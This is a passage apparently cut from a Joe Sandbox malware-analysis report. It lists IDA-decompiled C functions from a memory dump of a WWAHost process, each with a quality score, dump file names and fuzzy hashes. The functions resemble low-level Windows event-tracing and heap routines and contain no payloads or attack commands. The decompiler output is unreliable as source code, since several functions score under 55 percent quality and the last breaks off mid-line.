                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 54%
                                              			E03A28A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				signed int _v12;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				intOrPtr _v32;
                                              				intOrPtr _v36;
                                              				intOrPtr _v40;
                                              				short _v66;
                                              				char _v72;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed char* _t18;
                                              				signed int _t32;
                                              
                                              				_t29 = __edx;
                                              				_v12 =  *0x3a4d360 ^ _t32;
                                              				_t31 = _a8;
                                              				_t30 = _a12;
                                              				_v66 = 0x1c20;
                                              				_v40 = __ecx;
                                              				_v36 = __edx;
                                              				_v32 = _a4;
                                              				_v28 = _a8;
                                              				_v24 = _a12;
                                              				if(E03977D50() == 0) {
                                              					_t18 = 0x7ffe0386;
                                              				} else {
                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                              				}
                                              				_push( &_v72);
                                              				_push(0x14);
                                              				_push(0x20402);
                                              				_push( *_t18 & 0x000000ff);
                                              				return E0399B640(E03999AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                              			}

















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 576d6102714da22a59d67e0c09f20f3dcbbed344189f1cca336bd485a179c3b1
                                              • Instruction ID: 23afaac208943023a0a6ae4c17d5148813ee6b43885eaab87145ff36103ef56f
                                              • Opcode Fuzzy Hash: 576d6102714da22a59d67e0c09f20f3dcbbed344189f1cca336bd485a179c3b1
                                              • Instruction Fuzzy Hash: 15012C75A0131CAFDB00DFA9D9419AEBBB8EF98710F51405AF904EB341EB34A901CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 54%
                                              			E03A28ED6(intOrPtr __ecx, intOrPtr __edx) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				intOrPtr _v32;
                                              				intOrPtr _v36;
                                              				short _v62;
                                              				char _v68;
                                              				signed char* _t29;
                                              				intOrPtr _t35;
                                              				intOrPtr _t41;
                                              				intOrPtr _t42;
                                              				signed int _t43;
                                              
                                              				_t40 = __edx;
                                              				_v8 =  *0x3a4d360 ^ _t43;
                                              				_v28 = __ecx;
                                              				_v62 = 0x1c2a;
                                              				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                              				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                              				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                              				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                              				_v24 = __edx;
                                              				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                              				if(E03977D50() == 0) {
                                              					_t29 = 0x7ffe0386;
                                              				} else {
                                              					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                              				}
                                              				_push( &_v68);
                                              				_push(0x1c);
                                              				_push(0x20402);
                                              				_push( *_t29 & 0x000000ff);
                                              				return E0399B640(E03999AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 169e12eb28f8f51c5053c20862f9847d95ac6a54486ec1586a9eebcbea8fc0bf
                                              • Instruction ID: f561f467b589481c2dbad05ea161e9f41c98edcb77cf4879e3a659c4b4d28c24
                                              • Opcode Fuzzy Hash: 169e12eb28f8f51c5053c20862f9847d95ac6a54486ec1586a9eebcbea8fc0bf
                                              • Instruction Fuzzy Hash: 5F111E74A002599FDB04DFA8D441BAEFBF4FF48700F0442AAE918EB382E7349940CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0395DB60(signed int __ecx) {
                                              				intOrPtr* _t9;
                                              				void* _t12;
                                              				void* _t13;
                                              				intOrPtr _t14;
                                              
                                              				_t9 = __ecx;
                                              				_t14 = 0;
                                              				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                              					_t13 = 0xc000000d;
                                              				} else {
                                              					_t14 = E0395DB40();
                                              					if(_t14 == 0) {
                                              						_t13 = 0xc0000017;
                                              					} else {
                                              						_t13 = E0395E7B0(__ecx, _t12, _t14, 0xfff);
                                              						if(_t13 < 0) {
                                              							L0395E8B0(__ecx, _t14, 0xfff);
                                              							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                              							_t14 = 0;
                                              						} else {
                                              							_t13 = 0;
                                              							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                              						}
                                              					}
                                              				}
                                              				 *_t9 = _t14;
                                              				return _t13;
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                              • Instruction ID: 7821a2aae65c65f2b98167676841a4a788ca5b71f7e9ccad1cc2ea429b1f3f57
                                              • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                              • Instruction Fuzzy Hash: 3EF0C8376016239BD732DA594880B67B6AB8FC1AA1F190435B9059B244C960884297D0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0395B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                              				signed char* _t13;
                                              				intOrPtr _t22;
                                              				char _t23;
                                              
                                              				_t23 = __edx;
                                              				_t22 = __ecx;
                                              				if(E03977D50() != 0) {
                                              					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                              				} else {
                                              					_t13 = 0x7ffe0384;
                                              				}
                                              				if( *_t13 != 0) {
                                              					_t13 =  *[fs:0x30];
                                              					if((_t13[0x240] & 0x00000004) == 0) {
                                              						goto L3;
                                              					}
                                              					if(E03977D50() == 0) {
                                              						_t13 = 0x7ffe0385;
                                              					} else {
                                              						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                              					}
                                              					if(( *_t13 & 0x00000020) == 0) {
                                              						goto L3;
                                              					}
                                              					return E039D7016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                              				} else {
                                              					L3:
                                              					return _t13;
                                              				}
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                              • Instruction ID: 1a7129e330981a8eaa70dd4e8b31ba7747e912305065d556f025558e9ccf5cda
                                              • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                              • Instruction Fuzzy Hash: 3201F932200684DBE322D75EC909FA9BBECEF91790F0C44A1FD148B6B2D674C840D365
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 46%
                                              			E039EFE87(intOrPtr __ecx) {
                                              				signed int _v8;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				signed int _v24;
                                              				intOrPtr _v28;
                                              				short _v54;
                                              				char _v60;
                                              				signed char* _t21;
                                              				intOrPtr _t27;
                                              				intOrPtr _t32;
                                              				intOrPtr _t33;
                                              				intOrPtr _t34;
                                              				signed int _t35;
                                              
                                              				_v8 =  *0x3a4d360 ^ _t35;
                                              				_v16 = __ecx;
                                              				_v54 = 0x1722;
                                              				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                              				_v28 =  *((intOrPtr*)(__ecx + 4));
                                              				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                              				if(E03977D50() == 0) {
                                              					_t21 = 0x7ffe0382;
                                              				} else {
                                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                              				}
                                              				_push( &_v60);
                                              				_push(0x10);
                                              				_push(0x20402);
                                              				_push( *_t21 & 0x000000ff);
                                              				return E0399B640(E03999AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ba30ce3ba062d320cbe31bd7da32cde1181f242861b948a5897b610a4f7d160e
                                              • Instruction ID: 039bfd42ae882b7b4fc5aeb4ce5bdc380e85ec0bac02265cf49fe81c87296cda
                                              • Opcode Fuzzy Hash: ba30ce3ba062d320cbe31bd7da32cde1181f242861b948a5897b610a4f7d160e
                                              • Instruction Fuzzy Hash: 1D016274A00308AFCB14DFA8D541A6EB7F4EF48300F14415AA505EF382E635E901CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 48%
                                              			E03A1131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                              				signed int _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				short _v50;
                                              				char _v56;
                                              				signed char* _t18;
                                              				intOrPtr _t24;
                                              				intOrPtr _t30;
                                              				intOrPtr _t31;
                                              				signed int _t32;
                                              
                                              				_t29 = __edx;
                                              				_v8 =  *0x3a4d360 ^ _t32;
                                              				_v20 = _a4;
                                              				_v12 = _a8;
                                              				_v24 = __ecx;
                                              				_v16 = __edx;
                                              				_v50 = 0x1021;
                                              				if(E03977D50() == 0) {
                                              					_t18 = 0x7ffe0380;
                                              				} else {
                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                              				}
                                              				_push( &_v56);
                                              				_push(0x10);
                                              				_push(0x20402);
                                              				_push( *_t18 & 0x000000ff);
                                              				return E0399B640(E03999AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 162f3ffb6f13b8ef9ad2dbaced7f5182b25886392d32d4548594daa2a70d52af
                                              • Instruction ID: 72b3669e334cf4a784f39b4de5246ee406e780ebe26e63a23e8cf8caa7ad8d76
                                              • Opcode Fuzzy Hash: 162f3ffb6f13b8ef9ad2dbaced7f5182b25886392d32d4548594daa2a70d52af
                                              • Instruction Fuzzy Hash: B2013C75A01208AFDB44EFE9D545AAEB7F4FF48700F40405AB905EB381E634AA10CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 48%
                                              			E03A28F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                              				signed int _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				short _v50;
                                              				char _v56;
                                              				signed char* _t18;
                                              				intOrPtr _t24;
                                              				intOrPtr _t30;
                                              				intOrPtr _t31;
                                              				signed int _t32;
                                              
                                              				_t29 = __edx;
                                              				_v8 =  *0x3a4d360 ^ _t32;
                                              				_v16 = __ecx;
                                              				_v50 = 0x1c2c;
                                              				_v24 = _a4;
                                              				_v20 = _a8;
                                              				_v12 = __edx;
                                              				if(E03977D50() == 0) {
                                              					_t18 = 0x7ffe0386;
                                              				} else {
                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                              				}
                                              				_push( &_v56);
                                              				_push(0x10);
                                              				_push(0x402);
                                              				_push( *_t18 & 0x000000ff);
                                              				return E0399B640(E03999AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee0ba61a1e56d80df406d497cc5fae1f7355091746ee0b2397e4bdd9c6333189
                                              • Instruction ID: 4ea85dd98add7d78b2dd9a35ac845808ebf2f631a54966f4480e2779f81e6ec6
                                              • Opcode Fuzzy Hash: ee0ba61a1e56d80df406d497cc5fae1f7355091746ee0b2397e4bdd9c6333189
                                              • Instruction Fuzzy Hash: 4001F475A0121CAFDB04EFA8D545AAEB7F5FF58700F50445AB905EB381EB74EA00CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 46%
                                              			E03A11608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                              				signed int _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				short _v46;
                                              				char _v52;
                                              				signed char* _t15;
                                              				intOrPtr _t21;
                                              				intOrPtr _t27;
                                              				intOrPtr _t28;
                                              				signed int _t29;
                                              
                                              				_t26 = __edx;
                                              				_v8 =  *0x3a4d360 ^ _t29;
                                              				_v12 = _a4;
                                              				_v20 = __ecx;
                                              				_v16 = __edx;
                                              				_v46 = 0x1024;
                                              				if(E03977D50() == 0) {
                                              					_t15 = 0x7ffe0380;
                                              				} else {
                                              					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                              				}
                                              				_push( &_v52);
                                              				_push(0xc);
                                              				_push(0x20402);
                                              				_push( *_t15 & 0x000000ff);
                                              				return E0399B640(E03999AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                              			}

                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0fe592b33905f977c01939af4c411bc2bcfc1f8f7df4a34805c5081d50e173d7
                                              • Instruction ID: 7b52f53b7214654fe27938d5c2b37f8fdb1eb4c087d784a68afc6fd7f97b15ff
                                              • Opcode Fuzzy Hash: 0fe592b33905f977c01939af4c411bc2bcfc1f8f7df4a34805c5081d50e173d7
                                              • Instruction Fuzzy Hash: EDF06D75A11348EFDB14EFE8D405AAEB7F4EF58300F04406AA915EB381EA35A900CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0397C577(void* __ecx, char _a4) {
                                              				void* __esi;
                                              				void* __ebp;
                                              				void* _t17;
                                              				void* _t19;
                                              				void* _t20;
                                              				void* _t21;
                                              
                                              				_t18 = __ecx;
                                              				_t21 = __ecx;
                                              				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0397C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x39311cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                              					__eflags = _a4;
                                              					if(__eflags != 0) {
                                              						L10:
                                              						E03A288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                              						L9:
                                              						return 0;
                                              					}
                                              					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                              					if(__eflags == 0) {
                                              						goto L10;
                                              					}
                                              					goto L9;
                                              				} else {
                                              					return 1;
                                              				}
                                              			}

                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b471037c0e0ef38b8ac7ba3ba13acacd45553612f655c7a25560eb09977fec03
                                              • Instruction ID: f681d23d8f9370669964b002dd09bcdc888e64d087048a54547a543b1305de04
                                              • Opcode Fuzzy Hash: b471037c0e0ef38b8ac7ba3ba13acacd45553612f655c7a25560eb09977fec03
                                              • Instruction Fuzzy Hash: 2BF090B291DB919ED731DB588044B22BBDC9B057F0F4848A7D40587291D6A6DC80CA50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 54%
                                              			E0399927A(void* __ecx) {
                                              				signed int _t11;
                                              				void* _t14;
                                              
                                              				_t11 = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                              				if(_t11 != 0) {
                                              					E0399FA60(_t11, 0, 0x98);
                                              					asm("movsd");
                                              					asm("movsd");
                                              					asm("movsd");
                                              					asm("movsd");
                                              					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                              					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                              					E039992C6(_t11, _t14);
                                              				}
                                              				return _t11;
                                              			}

                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                              • Instruction ID: 25988b67860e2214dbbe3fb9303b15a2332e43a9b54b91512cc310afa53791b7
                                              • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                              • Instruction Fuzzy Hash: 93E09B323416406BFB61EE5ADC84F57775DDFC2721F04407DB5045E282D6E6DD0987A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 94%
                                              			E03A12073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                              				void* __esi;
                                              				signed char _t3;
                                              				signed char _t7;
                                              				void* _t19;
                                              
                                              				_t17 = __ecx;
                                              				_t3 = E03A0FD22(__ecx);
                                              				_t19 =  *0x3a4849c - _t3; // 0x0
                                              				if(_t19 == 0) {
                                              					__eflags = _t17 -  *0x3a48748; // 0x0
                                              					if(__eflags <= 0) {
                                              						E03A11C06();
                                              						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                              						__eflags = _t3;
                                              						if(_t3 != 0) {
                                              							L5:
                                              							__eflags =  *0x3a48724 & 0x00000004;
                                              							if(( *0x3a48724 & 0x00000004) == 0) {
                                              								asm("int3");
                                              								return _t3;
                                              							}
                                              						} else {
                                              							_t3 =  *0x7ffe02d4 & 0x00000003;
                                              							__eflags = _t3 - 3;
                                              							if(_t3 == 3) {
                                              								goto L5;
                                              							}
                                              						}
                                              					}
                                              					return _t3;
                                              				} else {
                                              					_t7 =  *0x3a48724; // 0x0
                                              					return E03A08DF1(__ebx, 0xc0000374, 0x3a45890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                              				}
                                              			}

                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2791b90b638d74721dd49c8b457ecdad525f1aa302ac55d4281e09dae12ad541
                                              • Instruction ID: d1b617782c0c5d606ba6f4034cc4a27289f24a1ff8ba3a10d0c01d352d817c70
                                              • Opcode Fuzzy Hash: 2791b90b638d74721dd49c8b457ecdad525f1aa302ac55d4281e09dae12ad541
                                              • Instruction Fuzzy Hash: 6EF0A76E4152984ADE32EB2472113D17B98D7C6250B1D0A8BD4501B205C63ECCA3DA24
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 43%
                                              			E03A28D34(intOrPtr __ecx, intOrPtr __edx) {
                                              				signed int _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				short _v42;
                                              				char _v48;
                                              				signed char* _t12;
                                              				intOrPtr _t18;
                                              				intOrPtr _t24;
                                              				intOrPtr _t25;
                                              				signed int _t26;
                                              
                                              				_t23 = __edx;
                                              				_v8 =  *0x3a4d360 ^ _t26;
                                              				_v16 = __ecx;
                                              				_v42 = 0x1c2b;
                                              				_v12 = __edx;
                                              				if(E03977D50() == 0) {
                                              					_t12 = 0x7ffe0386;
                                              				} else {
                                              					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                              				}
                                              				_push( &_v48);
                                              				_push(8);
                                              				_push(0x20402);
                                              				_push( *_t12 & 0x000000ff);
                                              				return E0399B640(E03999AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                              			}

                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ba63308419fe1cbfdda7a4ec44d3cfa804e5eed57649419864a04881913adeae
                                              • Instruction ID: 3c1e19e248e5dc04b3c4b860193fc2e0c1b90951e0ceb6ee9a5dd1c1fd11466c
                                              • Opcode Fuzzy Hash: ba63308419fe1cbfdda7a4ec44d3cfa804e5eed57649419864a04881913adeae
                                              • Instruction Fuzzy Hash: 5DF0B475A047189FDB14EFB8D441A6EB7B8EF58700F10809AF905EB281EA38E900C754
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 36%
                                              			E03A28B58(intOrPtr __ecx) {
                                              				signed int _v8;
                                              				intOrPtr _v20;
                                              				short _v46;
                                              				char _v52;
                                              				signed char* _t11;
                                              				intOrPtr _t17;
                                              				intOrPtr _t22;
                                              				intOrPtr _t23;
                                              				intOrPtr _t24;
                                              				signed int _t25;
                                              
                                              				_v8 =  *0x3a4d360 ^ _t25;
                                              				_v20 = __ecx;
                                              				_v46 = 0x1c26;
                                              				if(E03977D50() == 0) {
                                              					_t11 = 0x7ffe0386;
                                              				} else {
                                              					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                              				}
                                              				_push( &_v52);
                                              				_push(4);
                                              				_push(0x402);
                                              				_push( *_t11 & 0x000000ff);
                                              				return E0399B640(E03999AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                              			}

                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f7930fee94e82018b57f9b1e713519ba4f7bfcd0e350987d10b16de5f5c46eb0
                                              • Instruction ID: 2a5204b89c267a99c07f313e6d4fd94b7707dc7e602decf382c889385a69f133
                                              • Opcode Fuzzy Hash: f7930fee94e82018b57f9b1e713519ba4f7bfcd0e350987d10b16de5f5c46eb0
                                              • Instruction Fuzzy Hash: 33F05EB4A04258ABEB10EBA8D906A7EB7B8EB44600F04045AB9159B281EB34E900C798
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E03954F2E(void* __ecx, char _a4) {
                                              				void* __esi;
                                              				void* __ebp;
                                              				void* _t17;
                                              				void* _t19;
                                              				void* _t20;
                                              				void* _t21;
                                              
                                              				_t18 = __ecx;
                                              				_t21 = __ecx;
                                              				if(__ecx == 0) {
                                              					L6:
                                              					__eflags = _a4;
                                              					if(__eflags != 0) {
                                              						L8:
                                              						E03A288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                              						L9:
                                              						return 0;
                                              					}
                                              					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                              					if(__eflags != 0) {
                                              						goto L9;
                                              					}
                                              					goto L8;
                                              				}
                                              				_t18 = __ecx + 0x30;
                                              				if(E0397C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x3931030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                              					goto L6;
                                              				} else {
                                              					return 1;
                                              				}
                                              			}

                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4a14f0aea468e12979192febf1fe61badc0ce86de2be74d427f5910f0a15f0d8
                                              • Instruction ID: aefe138a4d5b6d23bd4f6ea99ba0b61c97cbb8611434d53a0506aac7ab44be42
                                              • Opcode Fuzzy Hash: 4a14f0aea468e12979192febf1fe61badc0ce86de2be74d427f5910f0a15f0d8
                                              • Instruction Fuzzy Hash: 6AF0BE365257A68FDB70D718C384FA3B7ECAB007FCF4844A5D8058BB20D724E880C640
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 36%
                                              			E03A28CD6(intOrPtr __ecx) {
                                              				signed int _v8;
                                              				intOrPtr _v12;
                                              				short _v38;
                                              				char _v44;
                                              				signed char* _t11;
                                              				intOrPtr _t17;
                                              				intOrPtr _t22;
                                              				intOrPtr _t23;
                                              				intOrPtr _t24;
                                              				signed int _t25;
                                              
                                              				_v8 =  *0x3a4d360 ^ _t25;
                                              				_v12 = __ecx;
                                              				_v38 = 0x1c2d;
                                              				if(E03977D50() == 0) {
                                              					_t11 = 0x7ffe0386;
                                              				} else {
                                              					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                              				}
                                              				_push( &_v44);
                                              				_push(0xffffffe4);
                                              				_push(0x402);
                                              				_push( *_t11 & 0x000000ff);
                                              				return E0399B640(E03999AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                              			}














                                              C-Code - Quality: 88%
                                              			E0397746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                              				signed int _t8;
                                              				void* _t10;
                                              				short* _t17;
                                              				void* _t19;
                                              				intOrPtr _t20;
                                              				void* _t21;
                                              
                                              				_t20 = __esi;
                                              				_t19 = __edi;
                                              				_t17 = __ebx;
                                              				if( *((char*)(_t21 - 0x25)) != 0) {
                                              					if(__ecx == 0) {
                                              						E0396EB70(__ecx, 0x3a479a0);
                                              					} else {
                                              						asm("lock xadd [ecx], eax");
                                              						if((_t8 | 0xffffffff) == 0) {
                                              							_push( *((intOrPtr*)(__ecx + 4)));
                                              							E039995D0();
                                              							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                              							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                              							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                              						}
                                              					}
                                              					L10:
                                              				}
                                              				_t10 = _t19 + _t19;
                                              				if(_t20 >= _t10) {
                                              					if(_t19 != 0) {
                                              						 *_t17 = 0;
                                              						return 0;
                                              					}
                                              				}
                                              				return _t10;
                                              				goto L10;
                                              			}










                                              C-Code - Quality: 100%
                                              			E0398A44B(signed int __ecx) {
                                              				intOrPtr _t13;
                                              				signed int _t15;
                                              				signed int* _t16;
                                              				signed int* _t17;
                                              
                                              				_t13 =  *0x3a47b9c; // 0x0
                                              				_t15 = __ecx;
                                              				_t16 = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                              				if(_t16 == 0) {
                                              					return 0;
                                              				}
                                              				 *_t16 = _t15;
                                              				_t17 =  &(_t16[2]);
                                              				E0399FA60(_t17, 0, _t15 << 2);
                                              				return _t17;
                                              			}








                                              C-Code - Quality: 79%
                                              			E0395F358(void* __ecx, signed int __edx) {
                                              				char _v8;
                                              				signed int _t9;
                                              				void* _t20;
                                              
                                              				_push(__ecx);
                                              				_t9 = 2;
                                              				_t20 = 0;
                                              				if(E0398F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
